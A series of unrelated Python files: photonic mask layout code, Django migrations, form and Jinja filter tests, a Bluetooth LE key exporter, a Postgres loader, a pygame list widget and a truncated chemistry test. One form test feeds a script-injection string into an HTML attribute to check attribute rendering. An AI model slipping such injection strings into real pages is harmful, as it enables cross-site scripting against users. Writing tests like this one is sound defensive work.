""" Creates a disk geometry at the specified location, given
radius, center, and layer.
"""
return gdspy.Round(center,radius,number_of_points=199,**layer)
def ring_wg(wg_len,wg_width,radius,disc_loc,dist,layer):
""" creates a disk geometry next to a waveguide. disc_loc, is the
location along the length of the waveguide where the disc is placed,
dist is the distance from the edge of the disc to the waveguide.
disc_loc is relative to the left edge of the waveguide.
"""
# first create the waveguide
wg=waveguide(wg_width,wg_len,layer)
# next calculate the location of the center of the circle relative to the
# waveguide's origin is it's center, and disc_loc is relative to the left
# edge of the waveguide
x=wg_len/2-disc_loc
# calculate the location of the center of the circle relative to the
# waveguide's origin
y=wg_width/2+dist+radius
# package the coordinates of the disc center
center=(x,y)
# create the disk geometry
disc=disc_resonator(radius,center,layer)
# return the two geometries
return wg,disc
def phc_mirror(numholes,radius,spacing,layer,offset,taper_depth=0.25,taper_holes=3):
"""
creates a list of circle shapes specifying a photonic_crystal_mirror.
Also returns the length of the mirror.
"""
holes=[]
dist=0
# unpack the offset vector
x,y=offset
for i in range(taper_holes):
print('here')
rad=radius*taper_depth+(1-taper_depth)*radius*i/(taper_holes)
print('radius: '+str(rad))
hole=gdspy.Round((dist+x,0+y),rad,number_of_points=199,**layer)
dist+=spacing
holes.append(hole)
for j in range(taper_holes,numholes):
hole=gdspy.Round((dist+x,0+y),radius,number_of_points=199,**layer)
dist+=spacing
holes.append(hole)
# WANT TO ADD AN INPUT TAPER SECTION
return holes
def boxed_ring(wg_len,wg_width,radius,disc_loc,dist,ebeam_layer,
opt_litho_layer,padding,clearance,supp_width,supp_len,tether_sp,tether_tri,
min_taper_width,taper_len,coupling_sp,mirror_holes,mirror_rad,mirror_sp,
name):
""" #this function creates a disc resonator next to a waveguide, as in
#ring_wg, but also adds support tethers, and a bounding box for HSQ
#patterning.
#Calls txt_rect function and bounding_box function.
#Padding is the width of the bounding rectangle.
#Clearance is how much the PR pattern overlaps with the ebeam pattern
tether_tri refers to the length of the tapered part of the support tether
coupling_sp is the space left past the end of the taper tip
name is a list with parameters that identify the pattern
"""
# Calculate the total pattern width and length
# add 5um of extra space on each side of the waveguide and disc
w_tot=wg_width+2*radius+dist+10
l_tot=wg_len+taper_len+coupling_sp+supp_len
# Calculate how much to shift the rectangle relative to the center of the
# pattern
shift=(-(taper_len+coupling_sp)/2,0)
# put all the relevant parameters in a dictonary
rect_args={}
rect_args['pattern_w']=2*w_tot
rect_args['pattern_l']=l_tot
rect_args['padding']=padding
rect_args['layer']=ebeam_layer
rect_args['rect_shift']=shift
rect_args['clearance']=clearance
rect_args['opt_litho_layer']=opt_litho_layer
rect,length,opt_rect=bounding_rectangle(**rect_args)
# create a text label for the pattern based on the spacing of the waveguide
# and name of pattern
# first cast the items in name into strings
str_name=[str(i) for i in name]
label=txt_label([str(dist)]+str_name)
txt_rect_args={}
txt_rect_args['bounding_box']=rect
txt_rect_args['box_length']=l_tot
txt_rect_args['box_width']=2*w_tot
txt_rect_args['txt_label']=label
txt_rect_args['layer']=ebeam_layer
txt_rect_args['rect_shift']=shift
txt_rect_args['txt_height']=1
txt_rect=text_rect(**txt_rect_args)
# create the disc and the waveguide
disc_args={}
disc_args['wg_len']=wg_len
disc_args['wg_width']=wg_width
disc_args['radius']=radius
disc_args['disc_loc']=disc_loc
disc_args['dist']=dist
disc_args['layer']=ebeam_layer
wg,disc=ring_wg(**disc_args)
# now add support structures
# support is a polygon
# because support is a polygon, it needs to be converted to a cell to be
# properly offset relative to the waveguide
supp_args={}
supp_args['wg_width']=wg_width
supp_args['w']=supp_width
supp_args['l']=supp_len
supp_args['layer']=ebeam_layer
supp=wg_support(**supp_args)
supp_cell=gdspy.Cell('support structure'+' '+str(name))
supp_cell.add(supp)
supp_ref=gdspy.CellReference(supp_cell,(l_tot/2-supp_len-(taper_len+coupling_sp)/2,0))
# now add tethers to support the waveguide
tether_args={}
tether_args['width']=0.1
# length is full length of tether less the length of the triangular part
tether_args['length']=w_tot-tether_tri
# create a 1um wide tether
tether_args['max_width']=1
tether_args['taper_length']=tether_tri
tether_args['wg_width']=0.525
tether_args['layer']=ebeam_layer
supp_tether=support_tether(**tether_args)
# create a cell for the support tether
tether_cell=gdspy.Cell('support tether'+' '+str(name))
tether_cell.add(supp_tether)
# want to repeat this geoemtry so add a list of cell references every
# tether_sp apart
# divide the waveguide length into a number of segments determined by
# tether spacing
# tether_list holds references to all the tethers
tether_list=[]
interval=math.floor(l_tot/tether_sp)
for i in range(interval):
loc=l_tot/2-taper_len/2-i*tether_sp
# now check if the tether is going to run through the disc
# determine the points around the disc
# keep a 5um space around the disc
disc_min=l_tot/2-disc_loc-radius-5
disc_max=l_tot/2-disc_loc+radius+5
if not(((loc>disc_min) and (loc<disc_max)) or (loc<-wg_len/2) or (loc>wg_len/2)):
tether_ref=gdspy.CellReference(tether_cell,(loc,0))
tether_list.append(tether_ref)
# now add tapered waveguide
# returns an input taper
taper_args={}
taper_args['min_width']=min_taper_width
taper_args['wg_width']=wg_width
taper_args['l']=taper_len
taper_args['layer']=ebeam_layer
taper=input_taper(**taper_args)
# need to create another cell reference too shift the taper to the end of the waveguide
taper_cell=gdspy.Cell('taper'+' '+str(name))
taper_cell.add(taper)
taper_ref=gdspy.CellReference(taper_cell,(-wg_len/2,0))
# add photonic crystal mirror
mirror_args={}
mirror_args['numholes']=mirror_holes
mirror_args['radius']=mirror_rad
mirror_args['spacing']=mirror_sp
mirror_args['layer']=opt_litho_layer
# define the offset of the mirror
# need to estimate the length of the mirror
# leave 1um of space between end of mirror from edge
mirror_len=mirror_args['spacing']*mirror_args['numholes']
mirror_args['offset']=(wg_len/2-mirror_len-1,0)
mirror=phc_mirror(**mirror_args)
# now subtract the mirror geometry from the waveguide
wg_sub=gdspy.boolean(wg,mirror,'not')
return wg_sub,disc,txt_rect,opt_rect,supp_ref,tether_list,taper_ref,l_tot,shift
def dicing_street(w,l,offset,layer,rect_width=90,alignment_sp=40):
"""creates a trench for DSE etching with alingnment marks for the dicing
saw
offset is an iterable holding the x and y offset
"""
x,y=offset
# calculate the height of the alignment marks
h=(w-40)/2
DSE=gdspy.Rectangle((-l/2+x,-w/2+y),(l/2+x,w/2+y),**layer)
UL=gdspy.Rectangle((-l/2-rect_width+x-alignment_sp,alignment_sp/2+y),(-l/2-alignment_sp+x,alignment_sp/2+h+y),**layer)
LL=gdspy.Rectangle((-l/2-rect_width+x-alignment_sp,-alignment_sp/2-h+y),(-l/2-alignment_sp+x,-alignment_sp/2+y),**layer)
UR=gdspy.Rectangle((l/2+x+alignment_sp,alignment_sp/2+y),(l/2+x+alignment_sp+rect_width,alignment_sp/2+h+y),**layer)
LR=gdspy.Rectangle((l/2+x+alignment_sp,-alignment_sp/2-h+y),(l/2+x+alignment_sp+rect_width,-alignment_sp/2+y),**layer)
return DSE,UL,LL,UR,LR |
# Generated by Django 3.0.2 on 2020-07-12 20:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('loans', '0003_auto_20200617_0103'),
]
operations = [
migrations.AddField(
model_name='collateralfiles',
name='file_url',
field=models.CharField(blank=True, max_length=300, null=True),
),
migrations.AddField(
model_name='collateralfiles',
name='token',
field=models.CharField(blank=True, max_length=300, null=True),
),
]
|
import proper_forms.fields as f
def test_render_attrs():
field = f.Text()
attrs = {
"id": "text1",
"classes": "myclass",
"data_id": 1,
"checked": True,
"ignore": False,
}
assert (
str(field.render_attrs(**attrs))
== 'class="myclass" data-id="1" id="text1" checked'
)
def test_render_attrs_empty():
field = f.Text()
assert str(field.render_attrs()) == ""
def test_render_attrs_bad():
field = f.Text()
assert (
str(field.render_attrs(myattr="a'b\"><script>bad();</script>"))
== 'myattr="a\'b"><script>bad();</script>"'
)
def test_object_value():
field = f.Text(prepare=lambda x: [str(x * 2)])
field.object_value = 2
assert field.values == ["4"]
assert field.value == "4"
def test_input_values():
field = f.Text()
field.input_values = ["hello"]
assert field.values == ["hello"]
assert field.value == "hello"
def test_input_value_over_object_value():
field = f.Text()
field.input_values = ["foo"]
field.object_value = "bar"
assert field.values == ["foo"]
assert field.value == "foo"
def test_render_error():
field = f.Text(required=True)
assert str(field.render_error()) == ""
field.validate()
error = "This field is required."
assert str(field.render_error()) == f'<div class="error">{error}</div>'
assert str(field.render_error("p")) == f'<p class="error">{error}</p>'
assert (
str(field.render_error(classes="errorMessage"))
== f'<div class="errorMessage">{error}</div>'
)
|
# Generated by Django 3.1.14 on 2022-02-02 07:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('topology', '0013_add_user_defined_properties_field'),
]
operations = [
migrations.RemoveField(
model_name='snapshot',
name='organization',
),
]
|
"""
==========
pcolormesh
==========
Shows how to combine Normalization and Colormap instances to draw
"levels" in pcolor, pcolormesh and imshow type plots in a similar
way to the levels keyword argument to contour/contourf.
"""
import matplotlib.pyplot as plt
from matplotlib.colors import BoundaryNorm
from matplotlib.ticker import MaxNLocator
import numpy as np
# make these smaller to increase the resolution
dx, dy = 0.05, 0.05
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[slice(1, 5 + dy, dy),
slice(1, 5 + dx, dx)]
z = np.sin(x)**10 + np.cos(10 + y*x) * np.cos(x)
# x and y are bounds, so z should be the value *inside* those bounds.
# Therefore, remove the last value from the z array.
z = z[:-1, :-1]
levels = MaxNLocator(nbins=15).tick_values(z.min(), z.max())
# pick the desired colormap, sensible levels, and define a normalization
# instance which takes data values and translates those into levels.
cmap = plt.get_cmap('PiYG')
norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)
fig, (ax0, ax1) = plt.subplots(nrows=2)
im = ax0.pcolormesh(x, y, z, cmap=cmap, norm=norm)
fig.colorbar(im, ax=ax0)
ax0.set_title('pcolormesh with levels')
# contours are *point* based plots, so convert our bound into point
# centers
cf = ax1.contourf(x[:-1, :-1] + dx/2.,
y[:-1, :-1] + dy/2., z, levels=levels,
cmap=cmap)
fig.colorbar(cf, ax=ax1)
ax1.set_title('contourf with levels')
# adjust spacing between subplots so `ax1` title and `ax0` tick labels
# don't overlap
fig.tight_layout()
plt.show()
|
#!/usr/bin/env python
"""
The data set that is in the specified hdf5 file has labels in two different locations.
The label input files have the .label suffix.
The foci input files have the .out suffix.
Vacuum up the labels from the two given directories, merge the relevant portions (image number,object number) and
convert from two-dimensional binary labeling into one multi class label, by the following scheme:
-1,-1 -> 0
1,-1 -> 1
-1,1 -> 2
1,1 -> 3
"""
from os import listdir, chdir, getcwd
from optparse import OptionParser
from tables.file import File, openFile, copyFile, hdf5Extension
from tables import Filters
from tables import Atom
import numpy as np
# Check that options are present, else print help msg.
parser = OptionParser()
parser.add_option("--labelinput", dest="labels_indir", help="read shape labels from here")
parser.add_option("--fociinput", dest="foci_indir", help="read foci labels from here")
parser.add_option("-f", "--filename", dest="filename", help="specify the .h5 filename that will contain the data labels")
(options, args) = parser.parse_args()
# label conversion dictionary
label_dict = {(-1.0,-1.0): 0, (1.0,-1.0): 1, (-1.0,1.0): 2, (1.0,1.0): 3}
''' Read files in directory loc, return a list of those ending with suffix '''
def read_filenames(loc,suffix):
files = listdir(loc)
selected = []
for f in files:
if f.endswith(suffix):
selected.append(f)
return selected
''' Read the given file (in directory dir) and return the numpy array within '''
def read_array_from_file(filename,dirname):
chdir(dirname)
array = np.genfromtxt(filename, delimiter=',', autostrip=True, usecols=(0,1,2))
return array
''' Take two arrays, merge them together after translating the labels which are in the first
column of each array
'''
def combine_arrays(foci_array,shape_array):
foci_labels = foci_array[:,0]
shape_labels = shape_array[:,0]
new_labels = np.array([label_dict[t] for t in zip(foci_labels,shape_labels)])
new_labels.shape = (len(new_labels),1)
return np.hstack((new_labels,foci_array[:,(1,2)]))
# Open and prepare an hdf5 file, adding a labels group
filename = options.filename
h5file = openFile(filename, mode = "a", title = "Data File")
labels_group = h5file.createGroup("/", 'labels', 'The labels and object IDs')
zlib_filters = Filters(complib='zlib', complevel=5)
# Go to the files location in the filesystem.
shape_input = options.labels_indir
foci_input = options.foci_indir
cur_dir = getcwd()
try:
foci_files = read_filenames(foci_input,'.out')
shape_files = read_filenames(shape_input,'.label')
except:
print "Could not read files from one of " + foci_input + ", " + shape_input
sys.exit(1)
foci_files.sort()
shape_files.sort()
# iterate over sorted & zipped files
for (f,s) in zip(foci_files,shape_files):
label_range = f.split('.')[0]
foci_array = read_array_from_file(f,foci_input)
shape_array = read_array_from_file(s,shape_input)
relabeled_array = combine_arrays(foci_array,shape_array)
atom = Atom.from_dtype(relabeled_array.dtype)
labels = h5file.createCArray(where=labels_group, name=label_range, atom=atom, shape=relabeled_array.shape, filters=zlib_filters)
labels[:] = relabeled_array
h5file.flush()
# Close the h5 file when done.
h5file.close()
|
from libs.operations import operator
print("mylib.py:", __name__)
# -- can do relative imports from file with parent package --
from .operations import operator
|
class ZiggeoWebhooks:
def __init__(self, application):
self.__application = application
def create(self, data = None):
return self.__application.connect.post('/v1/api/hook', data)
def confirm(self, data = None):
return self.__application.connect.post('/v1/api/confirmhook', data)
def delete(self, data = None):
return self.__application.connect.post('/v1/api/removehook', data)
|
#!/usr/bin/python3
"""
Export your Windows Bluetooth LE keys into Linux!
Thanks to: http://console.systems/2014/09/how-to-pair-low-energy-le-bluetooth.html
Usage:
$ ./export-ble-infos.py <args>
$ sudo bash -c 'cp -r ./bluetooth /var/lib && service bluetooth force-reload'
$ rm -r bluetooth
"""
import os
import shutil
import subprocess
import sys
import tempfile
from configparser import ConfigParser
from optparse import OptionParser
default_template = """
[General]
Name=Designer Mouse
Appearance=0x03c2
AddressType=static
SupportedTechnologies=LE;
Trusted=true
Blocked=false
Services=00001800-0000-1000-8000-00805f9b34fb;00001801-0000-1000-8000-00805f9b34fb;0000180a-0000-1000-8000-00805f9b34fb;0000180f-0000-1000-8000-00805f9b34fb;00001812-0000-1000-8000-00805f9b34fb;
[IdentityResolvingKey]
Key=
[LocalSignatureKey]
Key=
Counter=0
Authenticated=false
[LongTermKey]
Key=
Authenticated=0
EncSize=16
EDiv=
Rand=
[DeviceID]
Source=2
Vendor=1118
Product=2053
Version=272
[ConnectionParameters]
MinInterval=6
MaxInterval=6
Latency=60
Timeout=300
"""
def main():
parser = OptionParser()
parser.add_option("-v", "--verbose", action='store_true', dest='verbose')
parser.add_option("-s", "--system", dest="system", metavar="FILE",
default="/media/mygod/Windows/Windows/System32/config/system",
help="SYSTEM file in Windows. Usually at /Windows/System32/config/system.")
parser.add_option("-k", "--key", dest="key", metavar="KEY",
default=r"ControlSet001\Services\BTHPORT\Parameters\Keys",
help="Registry key for BT. [default: %default]")
parser.add_option("-o", "--output", dest="output", metavar="DIR", default="bluetooth",
help="Output directory. [default: %default]")
parser.add_option("-t", "--template", dest="template", metavar="FILE", help="Template file.")
parser.add_option("-a", "--attributes", dest='attributes', help="Additional attributes file to be copied.")
options, args = parser.parse_args()
if options.template:
with open(options.template) as file:
template = file.read()
else:
template = default_template
out = tempfile.mktemp(".reg")
reged = subprocess.Popen(["reged", "-x", options.system, '\\', options.key, out], stdout=sys.stderr)
reged.wait()
if reged.returncode:
return reged.returncode
dump = ConfigParser()
with open(out) as file:
reged_out = file.read()
if options.verbose:
print(reged_out)
dump.read_string(reged_out.split('\n', 1)[1])
os.unlink(out)
for section in dump:
path = section[len(options.key) + 2:].split('\\')
assert not path[0]
if len(path) == 3:
path[1] = ':'.join([path[1][i:i + 2] for i in range(0, len(path[1]), 2)]).upper()
path[2] = ':'.join([path[2][i:i + 2] for i in range(0, len(path[2]), 2)]).upper()
print("Dumping {}/{}...".format(path[1], path[2]))
config = ConfigParser()
config.optionxform = str
config.read_string(template)
def read_reg(key, expected_type):
def read_reg_actual(key, expected_type):
actual_type, content = dump[section]['"{}"'.format(key)].split(':', 1)
if expected_type == 'hex16':
assert actual_type == 'hex'
content = content.split(',')
assert len(content) == 16
return ''.join(content).upper()
if expected_type == 'qword':
assert actual_type == 'hex(b)'
content = content.split(',')
assert len(content) == 8
return str(int(''.join(content[::-1]), 16))
if expected_type == 'dword':
assert actual_type == expected_type
return str(int(content, 16))
assert False
result = read_reg_actual(key, expected_type)
if options.verbose:
print("{} of type {}: {}".format(key, expected_type, result))
return result
config['LongTermKey']['Key'] = read_reg('LTK', 'hex16')
# KeyLength ignored for now
config['LongTermKey']['Rand'] = read_reg('ERand', 'qword')
config['LongTermKey']['EDiv'] = read_reg('EDIV', 'dword')
config['IdentityResolvingKey']['Key'] = read_reg('IRK', 'hex16')
config['LocalSignatureKey']['Key'] = read_reg('CSRK', 'hex16')
output_dir = os.path.join(options.output, path[1], path[2])
os.makedirs(output_dir, exist_ok=True)
with open(os.path.join(output_dir, 'info'), 'w') as file:
config.write(file, False)
if options.attributes:
shutil.copyfile(options.attributes, os.path.join(output_dir, 'attributes'))
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/python3
"""sends a request to the URL
displays the value of the variable X-Request-Id in the response header"""
from sys import argv
from requests import get
if __name__ == "__main__":
url = argv[1]
r = get(url)
print(r.headers.get("X-Request-Id"))
|
import psycopg2 as pgres
import pandas as pd
# ___ Connect to ElephantSQL db _________
def conx_elephant(conx_str):
# instantiate and return connection obj
cnx = pgres.connect(conx_str)
return cnx
# _____ DROP table ____________
def drop_table(tbl_name, cur, conn):
qry = "DROP TABLE " + tbl_name
cur.execute(qry)
conn.commit()
return
# ---- CREATE a new table------------------
def create_table(tbl_name, fields_str, cur, conn):
qry = "CREATE TABLE " + tbl_name + " " + fields_str + ';'
cur.execute(qry)
conn.commit()
return
def insert_titanic(pgres_cur):
# __________
csv_url = "titanic.csv"
df = pd.read_csv(csv_url)
df.to_sql('titanic', if_exists='replace', con=pgres_cur, method='multi')
return
def main():
# ____ Connect to an ElephantSQL __________
dbname = ''
user = ''
host = ''
passw = ''
file = open('elephant.pwd', 'r')
ctr = 1
for line in file:
line=line.replace('\n', '')
if ctr == 1:
dbname = line
if ctr == 2:
user = line
if ctr == 3:
host = line
if ctr == 4:
passw = line
ctr = ctr + 1
pgres_str = 'dbname=' + dbname + ' user=' + user +' host=' + host + ' password=' + passw
pgres_conn = conx_elephant(pgres_str)
# ____ create cursor ___
pgres_cur = pgres_conn.cursor()
# ____ Port titanic.csv to Postgres ___
insert_titanic(pgres_conn)
# # _______ verify output _________
# query = """
# SELECT *
# FROM public.titanic
# LIMIT 10 ;
# """
# print('--- public.titanic table ---')
# for row in pgres_cur.execute(query).fetchall():
# print(row)
# ___ end main ___________
pgres_cur.close() # close cursor
pgres_conn.close() # close connection
return
# Launched from the command line
if __name__ == '__main__':
main()
|
from heapq import heappush, heappop, heapify
# heappop - pop and return the smallest element from heap,
# maintaining the heap invariant.
# heappush - push the value item onto the heap,
# maintaining heap invarient.
# heapify - transform list into heap, in place,
# in linear time
class MinHeap:
def __init__(self):
self.heap = []
def heapify(self,arr):
heapify(arr)
self.heap=arr
return self.heap
def parent(self, i):
return (i-1)//2
def insertKey(self, k):
heappush(self.heap, k)
print(self.heap)
def decreaseKey(self, i, new_val):
self.heap[i] = new_val
while(i != 0 and self.heap[self.parent(i)] > self.heap[i]):
self.heap[i] , self.heap[self.parent(i)] = (
self.heap[self.parent(i)], self.heap[i])
i=self.parent(i)
def extractMin(self):
return heappop(self.heap)
def deleteindex(self, i):
self.decreaseKey(i, float("-inf"))
self.extractMin()
def getMin(self):
return self.heap[0]
heapObj = MinHeap()
heapObj.insertKey(3)
heapObj.insertKey(2)
heapObj.insertKey(15)
heapObj.insertKey(5)
heapObj.insertKey(4)
heapObj.deleteindex(3)
heapObj.insertKey(45)
heapObj.insertKey(1)
heapObj.heapify([3,2,15,5,4,45,1])
print(heapObj.heap)
heapObj.insertKey(6)
print(heapObj.heap)
heapObj.deleteindex(3)
print(heapObj.heap)
|
import pytest
import jira_context
from jira_context import INPUT, JIRA
@pytest.fixture(autouse=True)
def reset_jira():
jira_context._prompt = lambda f, p: 'user' if f == INPUT else 'pass'
JIRA.ABORTED_BY_USER = False
JIRA.COOKIE_CACHE_FILE_PATH = None
JIRA.FORCE_USER = None
JIRA.MESSAGE_AUTH_ERROR = 'Error occurred, try again.'
JIRA.MESSAGE_AUTH_FAILURE = 'Authentication failed or bad password, try again.'
JIRA.PROMPT_PASS = 'JIRA password: '
JIRA.PROMPT_USER = 'JIRA username: '
JIRA.USER_CAN_ABORT = True
JIRA.DEFAULT_OPTIONS['server'] = 'http://localhost/jira'
|
from datetime import datetime
from unittest import TestCase
from mock import Mock
from app.jinja_filters import format_date, format_currency, format_multilined_string, format_percentage
from app.jinja_filters import format_household_member_name
from app.jinja_filters import format_str_as_date
from app.jinja_filters import format_str_as_date_range
from app.jinja_filters import format_str_as_month_year_date
class TestJinjaFilters(TestCase):
def test_format_currency(self):
# Given
currency = 1.12
# When
format_value = format_currency(currency)
self.assertEqual(format_value, '£1.12')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
context = Mock()
context.autoescape = False
# When
format_value = format_multilined_string(context, new_line)
self.assertEqual(format_value, '<p>this is on a new<br>line</p>')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
context = Mock()
context.autoescape = False
# When
format_value = format_multilined_string(context, new_line)
self.assertEqual(format_value, '<p>this is on a new<br>line</p>')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
context = Mock()
context.autoescape = False
# When
format_value = format_multilined_string(context, new_line)
self.assertEqual(format_value, '<p>this is on a new<br>line</p>')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
context = Mock()
context.autoescape = False
# When
format_value = format_multilined_string(context, new_line)
self.assertEqual(format_value, '<p>this is<br>on a<br>new<br>line</p>')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
context = Mock()
context.autoescape = True
# When
format_value = format_multilined_string(context, new_line)
self.assertEqual(str(format_value), '<p><</p>')
def test_format_date(self):
# Given
date = datetime.strptime('01/01/17', '%d/%m/%y')
# When
format_value = format_date(date)
self.assertEqual(format_value, '1 January 2017')
def test_format_str_as_date_range(self):
# Given
date_range = {'from': '01/01/2017',
'to': '01/01/2018'}
# When
format_value = format_str_as_date_range(date_range)
self.assertEqual(format_value, '01 January 2017 to 01 January 2018')
def test_format_str_as_month_year_date(self):
# Given
month_year_date = '3/2018'
# When
format_value = format_str_as_month_year_date(month_year_date)
self.assertEqual(format_value, 'March 2018')
def test_format_str_as_date(self):
# Given
date = '02/03/2017'
# When
format_value = format_str_as_date(date)
self.assertEqual(format_value, '02 March 2017')
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John J Doe')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
|
import pygame
import tydev
from tydev.gui.template import Template
class List(Template):
def __init__(self, location, size):
Template.__init__(self, location=location, size=size)
self.background_color = (255, 255, 255)
self.highlight_color = (130, 145, 255)
self.objects = []
self.scroll_amount = 0.0
self.scroll_max = 0.0
self.scroll_speed = 25.0
self.selected = -1
self.map = {}
self.list_height = 0.0
self.redraw = True
self.object_images = []
self.scrollbar_location = [0, 0]
self.scrollbar_bounds = [0, 0]
self.scrollbar_width = 10
self.scrollbar_color = (120, 130, 230, 255)
self.scrollbar_backcolor = (50, 50, 50, 120)
def append(self, object):
self.objects.append(object)
self.redraw = True
def clear(self):
self.objects.clear()
self.redraw = True
def count(self):
return len(self.objects)
def draw(self):
if self.redraw:
self.redraw = False
# Render all the objects in the list
self.object_images = []
for obj in self.objects:
obj.draw()
self.object_images.append(obj.image)
self.image.fill(self.background_color)
# Place each list object onto the list image
y = -self.scroll_amount
self.list_height = 0.0
index = 0
self.map.clear()
for img in self.object_images:
# Remap the y locations of each object
self.map[str(y)] = index
# Highlight image if selected
if self.selected == index:
height = img.get_height()
width = self.image.get_width()
pygame.draw.rect(self.image, self.highlight_color,
(0, y, width, height))
index += 1
# Draw the image
self.image.blit(img, (0, y))
y += img.get_height()
self.list_height += img.get_height()
self.scroll_max = self.list_height - self.size[1]
# Draw scrollbar
if self.list_height > self.size[1]:
x = self.image.get_width() - self.scrollbar_width
y = 0
w = self.scrollbar_width
h = self.image.get_height()
self.scrollbar_bounds = (x, h)
pygame.draw.rect(self.image, self.scrollbar_backcolor, (int(x), int(y), int(w), int(h)), 0)
h = (self.size[1] / self.list_height) * self.size[1]
y = (self.size[1] - h + 1) * (self.scroll_amount / self.scroll_max)
pygame.draw.rect(self.image, self.scrollbar_color, (int(x), int(y), int(w), int(h)), 0)
def move(self, amount):
self.selected += amount
if self.selected < 0:
self.selected = 0
elif self.selected >= len(self.objects):
self.selected = len(self.objects) - 1
def event(self, event, delta):
if self.mouse_over():
if event.type == pygame.MOUSEWHEEL:
if self.list_height > self.size[1]:
self.scroll_amount -= event.y * self.scroll_speed
if self.scroll_amount > self.scroll_max:
self.scroll_amount = self.scroll_max
elif self.scroll_amount < 0:
self.scroll_amount = 0
elif event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1 or event.button == 3:
if self.mouse_over():
mouse = self.get_relative_mouse()
y = mouse[1]
for index in self.map:
if y > float(index):
self.selected = self.map[index]
elif event.type == pygame.KEYDOWN:
if self.has_focus:
if event.button == pygame.K_UP:
self.move(-1)
elif event.button == pygame.K_DOWN:
self.move(-1)
index = 0
height = 0
for obj in self.objects:
y = self.location[1] + height - self.scroll_amount
x = self.location[0]
height += obj.image.get_height()
obj.location = [x, y]
obj.event(event, delta)
index += 1
def update(self, delta):
for obj in self.objects:
obj.update(delta) |
# A module to tests the methods of the SuperSystem
import unittest
import os
import shutil
import re
from copy import copy
from qsome import cluster_subsystem, cluster_supersystem, helpers
from pyscf import gto, lib, scf, dft
import numpy as np
import scipy as sp
import tempfile
class TestClusterSuperSystemMethods(unittest.TestCase):
def setUp(self):
mol1 = gto.Mole()
mol1.verbose = 3
mol1.atom = '''
O 0.000000 0.000000 0.000000
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284'''
mol1.basis = 'cc-pVDZ'
mol1.build()
self.cs_mol1 = mol1
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
O 0.000000 10.000000 0.000000
H 0.758602 10.000000 0.504284
H 0.758602 10.000000 -0.504284'''
mol2.basis = 'cc-pVDZ'
mol2.build()
self.cs_mol2 = mol2
mol3 = gto.Mole()
mol3.verbose = 3
mol3.atom = '''
He 1.0 20.0 0.0
He 3.0 20.0 0.0'''
mol3.basis = '3-21g'
mol3.build()
self.cs_mol3 = mol3
mol4 = gto.Mole()
mol4.verbose = 3
mol4.atom = '''
H 0. -2.757 2.857
H 0. 2.757 2.857
ghost:H 0. 0. 2.857
'''
mol4.basis = '3-21g'
mol4.build()
self.env_method = 'lda'
self.cs_mol4 = mol4
mol5 = gto.Mole()
mol5.verbose = 3
mol5.atom = '''
H 0. -2.757 2.857
H 0. 2.757 2.857
ghost:H 0. 0. 2.857
He 1.0 20.0 0.0
He 3.0 20.0 0.0
'''
mol5.basis = '3-21g'
mol5.build()
self.cs_mol34 = mol4
mol6 = gto.Mole()
mol6.verbose = 3
mol6.atom = '''
He 3.0 0.0 0.0'''
mol6.basis = '3-21g'
mol6.build()
self.cs_mol5 = mol6
os_mol1 = gto.Mole()
os_mol1.verbose = 3
os_mol1.atom = '''
Li 0.0 0.0 0.0
'''
os_mol1.basis = '3-21g'
os_mol1.spin = 1
os_mol1.build()
self.os_mol1 = os_mol1
os_mol2 = gto.Mole()
os_mol2.verbose = 3
os_mol2.atom = '''
Li 0.0 0.0 0.0
He 3.0 0.0 0.0
'''
os_mol2.basis = '3-21g'
os_mol2.spin = 1
os_mol2.build()
self.os_mol16 = os_mol2
os_mol3 = gto.Mole()
os_mol3.verbose = 3
os_mol3.atom = '''
H 1.595 0.0 0.0'''
os_mol3.basis = '3-21g'
os_mol3.spin = -1
os_mol3.build()
self.os_mol2 = os_mol3
os_mol4 = gto.Mole()
os_mol4.verbose = 3
os_mol4.atom = '''
O 1.94 0.0 0.0'''
os_mol4.basis = '3-21g'
os_mol4.spin = 2
os_mol4.build()
self.os_mol3 = os_mol4
mol8 = gto.Mole()
mol8.verbose = 3
mol8.atom = '''
Li 0.0 0.0 0.0
H 1.595 0.0 0.0'''
mol8.basis = '3-21g'
mol8.build()
self.cs_mol13 = mol8
def test_init_densities(self):
env_method = 'lda'
hl_method = 'ccsd'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, env_method, hl_method)
